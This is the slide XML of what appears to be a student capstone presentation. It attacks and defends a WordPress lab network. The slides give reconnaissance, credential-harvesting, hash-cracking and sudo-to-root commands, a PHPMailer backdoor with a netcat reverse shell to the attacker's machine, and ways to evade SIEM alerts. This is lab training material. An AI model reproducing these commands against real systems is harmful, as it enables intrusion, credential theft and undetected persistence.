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y="13716000" cx="2437765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Inconsolata"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light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  <p:embeddedFont>
      <p:font typeface="Oswald Medium"/>
      <p:regular r:id="rId50"/>
      <p:bold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Amatic SC"/>
      <p:regular r:id="rId56"/>
      <p:bold r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald Light"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald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85781E-5087-46A9-89A6-BCDB590ED3A2}">
  <a:tblStyle styleId="{7985781E-5087-46A9-89A6-BCDB590ED3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regular.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-bold.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight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RobotoLight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Oswald-bold.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular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71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-boldItalic.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-italic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62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-regular.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-boldItalic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-italic.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-bold.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OswaldLight-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-boldItalic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-regular.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OswaldLight-bold.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-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PoppinsMedium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OswaldMedium-bold.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OswaldMedium-regular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2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1.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AmaticSC-bold.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AmaticSC-regular.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins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017603533f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017603533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2397" name="Google Shape;2397;g1017603533f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017603533f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1017603533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2406" name="Google Shape;2406;g1017603533f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1017603533f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101760353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2417" name="Google Shape;2417;g1017603533f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1017603533f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101760353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101955521b8_4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101955521b8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101955521b8_4_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101955521b8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fa8f5bcb82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fa8f5bcb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01c6df5a6f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101c6df5a6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g101c6df5a6f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fa8f5bcb8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fa8f5bcb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gfa8f5bcb82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1017603533f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101760353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" name="Google Shape;2363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1017603533f_0_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101760353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3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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143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48.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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64.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180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81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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193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92.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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2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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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6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69.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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95.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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8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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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image" Target="../media/image101.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109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Relationship Id="rId8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17.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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17.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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17.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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17.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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1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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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00" cy="71160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300" cy="630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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image228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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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192.168.1.110/wordpress/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Final Engagement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Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Attack, Defense &amp; Analysis of a Vulnerable Network</a:t>
            </a:r>
            <a:endParaRPr sz="6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Fides, Beven, Samih, Jack and Richard</a:t>
            </a:r>
            <a:endParaRPr sz="50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Exploitation: MySQL Database Access &amp; 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Privilege Escalation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0" name="Google Shape;2400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1" name="Google Shape;2401;p145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2059525"/>
            <a:ext cx="24443100" cy="10881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●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Utilized “michael’s” privileges to locate the MySQL config files and  gain “root” privileges which led to the discovery usernames and unsalted passwords for the WordPress site’s database.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cat /var/www/html/wordpress/wp-config.php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Following information was revealed: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DB_NAME; wordpress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DB_USER; root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DB_PASSWORD; R@v3nSecurity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02" name="Google Shape;240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800" y="5274050"/>
            <a:ext cx="14035400" cy="70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Exploitation: MySQL Database Access </a:t>
            </a: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&amp; Privilege Escalation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9" name="Google Shape;2409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0" name="Google Shape;2410;p146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="2080751"/>
            <a:ext cx="24377700" cy="11003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●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We then escalated our privileges to “root” and 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discovered unsalted password hashes.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mysql –u root -p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show databases;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use wordpress;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show tables;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select * from wp_users;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11" name="Google Shape;241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650" y="3656438"/>
            <a:ext cx="4120025" cy="3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9250" y="2854426"/>
            <a:ext cx="4120025" cy="563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181" y="9091113"/>
            <a:ext cx="18427925" cy="3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0" name="Google Shape;2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50" y="1500400"/>
            <a:ext cx="23010250" cy="23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p147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-80475" y="0"/>
            <a:ext cx="24443100" cy="25479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Exploitation: </a:t>
            </a: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Brute Forced User Steven’s Password Hash &amp; Remote Code Execution/Privilege Escalation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22" name="Google Shape;2422;p147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3025600"/>
            <a:ext cx="24377700" cy="10058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●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We then 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Copied Steven’s unsalted password hash from MySQL database and created the file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wp_hashes.txt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”, and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000"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used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John The Ripper</a:t>
            </a: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” ( password cracking software tool) to Brute Force his password.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Font typeface="Oswald"/>
              <a:buChar char="○"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john wp_hashes.txt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john --show wp_hashes.txt</a:t>
            </a:r>
            <a:endParaRPr sz="4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After cracking Steven`s password we SSH`d into his account, listed his privileges and escalated them to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root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ssh steven@192.168.1.110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sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’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23" name="Google Shape;242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5375" y="4470187"/>
            <a:ext cx="8832375" cy="8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412" y="10870200"/>
            <a:ext cx="15630824" cy="11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Google Shape;2425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158" y="8663308"/>
            <a:ext cx="14847350" cy="18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Google Shape;243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p14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32" name="Google Shape;2432;p14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Avoiding Detection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33" name="Google Shape;2433;p14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WordPress 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Enumeration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39" name="Google Shape;2439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0" name="Google Shape;2440;p149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1847200"/>
            <a:ext cx="24377700" cy="11274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Monitoring Overview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alerts detect this exploit?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WHEN count() GROUPED OVER top 5 ‘http.response.status_code’ IS ABOVE 400 FOR THE LAST 5 minutes.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metrics do they measure?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http.response.status_code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thresholds do they fire at?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When above 400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Mitigating Detection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can you execute the same exploit without triggering the alert?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Implement a pause for 5 minutes after every 100 requests.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Are there alternative exploits that may perform better?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Gobuster is an alternative to wpscan.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WordPress Enumeration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6" name="Google Shape;2446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7" name="Google Shape;2447;p150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2295400"/>
            <a:ext cx="24377700" cy="10826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See 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screenshot of our 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stealth technique.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48" name="Google Shape;244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000" y="1910874"/>
            <a:ext cx="16852199" cy="103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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4676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Network Enumeration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4" name="Google Shape;2454;p1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5" name="Google Shape;2455;p15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Monitoring Overview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a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lerts detect this exploit?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WHEN sum() of http.request.bytes OVER all documents IS ABOVE 3500 FOR THE LAST 1 minute.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metrics do they measure?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Packets requests from the same source IP to all destination ports.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th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resholds do they fire at?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Above 3500 bytes per minute.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Mitigating Detection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can you execute the same exploit without triggering the alert?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Target only known ports (known for vulnerabilities) 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Are there alternative exploits that may perform better?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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4676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Network Enumeration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1" name="Google Shape;2461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2" name="Google Shape;2462;p15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See screenshot of our stealth technique.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63" name="Google Shape;246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3080475"/>
            <a:ext cx="21787151" cy="92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5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Stealth Exploitation of Brute Force Attack / Vulnerability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9" name="Google Shape;2469;p1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0" name="Google Shape;2470;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10836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Monitoring Overview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alerts detect this exploit?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WHEN max() OF system.process.cpu.total.pct OVER all documents</a:t>
            </a:r>
            <a:endParaRPr sz="4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metrics do they measure?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system.process.cpu.total</a:t>
            </a:r>
            <a:endParaRPr sz="4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Which thresholds do they fire at?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Is above 0.5</a:t>
            </a:r>
            <a:endParaRPr sz="4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Mitigating Detection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can you execute the same exploit without triggering the alert?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By copying the wp_hashes.txt onto the kali machine and using john on our attacking machine to avoid the CPU spike.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Are there alternative exploits that may perform better?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As alternative we would suggest using Hashcat, this exploit uses GPU instead of the CPU. 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15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Stealth Exploitation of Brute Force Attack / Vulnerability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6" name="Google Shape;2476;p1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7" name="Google Shape;2477;p154"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10836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See screenshot of our stealth technique.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The Brute Force Attack was completed without triggering the alert since the password was very weak and easy to crack.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78" name="Google Shape;247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976" y="5460199"/>
            <a:ext cx="17074550" cy="55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Table of Contents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3" name="Google Shape;2333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This document contains the following resources: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4" name="Google Shape;2334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5" name="Google Shape;2335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Network Topology &amp; Critical Vulnerabilities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6" name="Google Shape;2336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Exploits Used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7" name="Google Shape;2337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Methods Used to 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Avoiding Detect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3" name="Google Shape;248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5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85" name="Google Shape;2485;p15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Maintaining Access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6" name="Google Shape;2486;p15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Installing Backdoor (CVE-2016-10033) on Target 1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3" name="Google Shape;2493;p1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4" name="Google Shape;2494;p156"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="2002301"/>
            <a:ext cx="24377700" cy="11081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first i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nstalled a backdoor via a script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exploit.sh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and  then we started a listener on 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Port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4444 via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Netcat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bash exploit.sh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nc -lnvp 4444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Next we utilized the script “</a:t>
            </a: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backdoor.php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that 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our “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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exploit.sh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placed in into /var/html/ by accessing it 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directly through a web browser and putting on a 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reverse shell command in html friendly format.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192.168.1.110/backdoor.php?cmd=nc%20192.168.1.90</a:t>
            </a:r>
            <a:b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%204444%20-e%20/bin/bash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Now we have a shell in the Target1 machine again and have maintained our access, this exploit works due to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CVE-2016-10033</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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which is a vulnerability in the PHPmailer before version 5.2.18, and since this machine is running 5.2.16 it is susceptible.</a:t>
            </a:r>
            <a:endParaRPr sz="40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495" name="Google Shape;249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6762" y="8800675"/>
            <a:ext cx="10026750" cy="14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Google Shape;249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7600" y="3088850"/>
            <a:ext cx="10265075" cy="5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75" y="8800675"/>
            <a:ext cx="11610726" cy="4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15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Installing Backdoor on Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2504" name="Google Shape;2504;p1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5" name="Google Shape;2505;p15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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226867" y="202844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Screenshot of access through NCAT listener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07" name="Google Shape;250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27" y="3216375"/>
            <a:ext cx="11760925" cy="81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4199" y="2731487"/>
            <a:ext cx="11083650" cy="90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Google Shape;234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4" name="Google Shape;2344;p138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731425" y="4936277"/>
            <a:ext cx="22914900" cy="3377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Network Topology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&amp; Critical Vulnerabilities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5" name="Google Shape;2345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39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Network</a:t>
            </a:r>
            <a:endParaRPr sz="26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Address Range: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192.168.1.0/24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Netmask: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255.255.255.0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Gateway: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Machines</a:t>
            </a:r>
            <a:endParaRPr sz="26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192.168.1.90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Linux 5.4.0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Kali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192.168.1.110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Linux 3.2-4.9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Target 1 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1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192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accen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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Oswald Light"/>
                <a:ea typeface="Oswald Light"/>
                <a:cs typeface="Oswald Light"/>
                <a:sym typeface="Oswald Light"/>
              </a:rPr>
              <a:t>Linux 3.2-4.9</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accen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1"/>
                </a:solidFill>
                <a:latin typeface="Oswald Light"/>
                <a:ea typeface="Oswald Light"/>
                <a:cs typeface="Oswald Light"/>
                <a:sym typeface="Oswald Light"/>
              </a:rPr>
              <a:t>Target 2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192.168.1.100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Ubuntu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18.04.4 LTS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ELK-Server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IPv4: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192.168.1.105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OS: Ubuntu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 18.04.4 LTS</a:t>
            </a:r>
            <a:endParaRPr sz="24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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Oswald Light"/>
                <a:ea typeface="Oswald Light"/>
                <a:cs typeface="Oswald Light"/>
                <a:sym typeface="Oswald Light"/>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent4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351" name="Google Shape;2351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Network Topology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52" name="Google Shape;235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000" y="1755400"/>
            <a:ext cx="16405124" cy="1143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Critical Vulnerabilities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: Target 1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8" name="Google Shape;2358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9" name="Google Shape;2359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Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Our assessment uncovered the following critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t> in Target 1.</a:t>
            </a:r>
            <a:endParaRPr sz="4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360" name="Google Shape;2360;p140"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1191000" y="34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{7985781E-5087-46A9-89A6-BCDB590ED3A2}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Vulnerability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Description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Impact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WordPress discoverable usernames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Users that are externally discoverable will give attackers half of the information required to brute force login (in basic authentication).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Attacker was able to use Hydra and standard rockyou to find the password for user ‘michael’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Weak P</a:t>
                      </a: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asswords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Weak Passwords are used and easily cracked with brute-force.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Attacker was able to use Hydra and </a:t>
                      </a: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John The Ripper</a:t>
                      </a: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 to get the user passwords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wp-config in default location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wp-config contains information that allows WordPress to communicate </a:t>
                      </a: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with the database (including the username and password). This is easily found in the default location. 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Attacker was able to source the username and password used by WordPress and was able to look at the data contained in the tables inside of the wordpress database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NOPASSWD Privilege Escalation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Python is allowed to run with sudo privilege without password.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Attacker was able to initiate /bin/bash from a python command and get a shell as root</a:t>
                      </a:r>
                      <a:endParaRPr sz="2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" name="Google Shape;236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67" name="Google Shape;2367;p14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Exploits Used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8" name="Google Shape;2368;p14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142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32716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Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Exploitation: Network Mapping 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4" name="Google Shape;2374;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948164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5" name="Google Shape;2375;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2295400"/>
            <a:ext cx="24377700" cy="1080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Summarize the following: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used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Nmap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to scan the network for open and expose potentially vulnerable entry points.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nmap -sV 192.168.1.110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noticed that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Port 22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Port 80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were open and decided to use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wpscan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with the goal in mind to enumerate the user on the WordPress-Server.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749" y="4991398"/>
            <a:ext cx="17712151" cy="40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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
